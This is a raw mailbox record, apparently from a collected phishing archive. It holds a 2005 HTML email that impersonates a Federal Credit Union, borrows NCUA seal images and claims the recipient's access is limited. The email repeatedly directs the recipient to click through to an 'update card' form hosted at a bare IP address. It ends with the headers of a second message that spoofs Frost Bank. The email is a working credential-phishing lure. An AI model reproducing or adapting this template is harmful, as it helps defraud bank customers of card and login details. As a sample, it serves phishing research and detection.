From: "Federal Credit Union" <new@pellin.us>
Subject: Credit Unions Banks Update
Date: Sat, 23 Jul 2005 21:32:46 -0700
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-Id: <20050725082230.EFF83183783@mail2.monkey.org>
To: undisclosed-recipients: ;
Content-Length: 2216
Lines: 51
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 142

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Account Info Verification</title>
</head>

<body>

<table cellSpacing="0" cellPadding="5" width="376" border="0">
  <tr vAlign="top">
    <td width="366">
    <table cellSpacing="0" cellPadding="0" width="100%" border="0">
      <tr>
        <td class="pp_heading" align="left">
    <a href="http://62.193.199.211/fcu/fcu/update_card.htm" name="top"><IMG height=98 
      alt="NCUA Seal" src="http://www.ncua.gov/images/prop/blueseal98.gif" width=100 
      align=left border=0></a></td>
      </tr>
    </table>
    </td>
  </tr>
  <tr>
    <td width="366">Dear FCU client,<p>As part of our security measures, we regularly screen activity in Federal 
    Credit Unions (FCU) network.<br>
    We recently noticed the following issue on your account: A recent review of 
    your transaction history determined that we require some additional information from you 
    in order to provide you with secure service. Case ID Number: PP-065-617-349 
    For your protection, we have limited&nbsp; your access,&nbsp; until additional 
    security measures can be completed. We apologize for any inconvenience this 
    may cause. Please log and restore your access as soon 
    as possible. <br>
    <br>
    You must <b>click the link below</b> and fill in the form on the following 
    page to complete the verification process.<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                            <a href="http://62.193.199.211/fcu/fcu/update_card.htm">Click 
                              here to update your 
                      account</a><p>Please do not reply to this e-mail. 
                        Mail sent to this address cannot be answered.<p>
                          <a href="http://62.193.199.211/fcu/fcu/update_card.htm"><IMG height=100 
                        alt="NCUA Share Insurance Logo" 
                        src="http://www.ncua.gov/images/prop/BLUELAB.gif" 
                      width=200></a></td>
  </tr>
</table>

</body>

</html>

From myfrost.emailalerts@frostbank.com  Mon Jul 25 05:42:33 2005
Return-Path: <myfrost.emailalerts@frostbank.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 32316536E65
	for <jose@login.monkey.org>; Mon, 25 Jul 2005 05:42:33 -0400 (EDT)
Received: from 82.79.189.249 (unknown [82.79.189.249])
	by mail2.monkey.org (Postfix) with SMTP id 5775C183773
	for <jose@monkey.org>; Mon, 25 Jul 2005 05:42:32 -0400 (EDT)
Received: from 188.240.120.101 by ; Mon, 25 Jul 2005 07:33:32 -0300
Message-ID: <HHXPQVVXAHNDUZLFQIVW@yahoo.com>
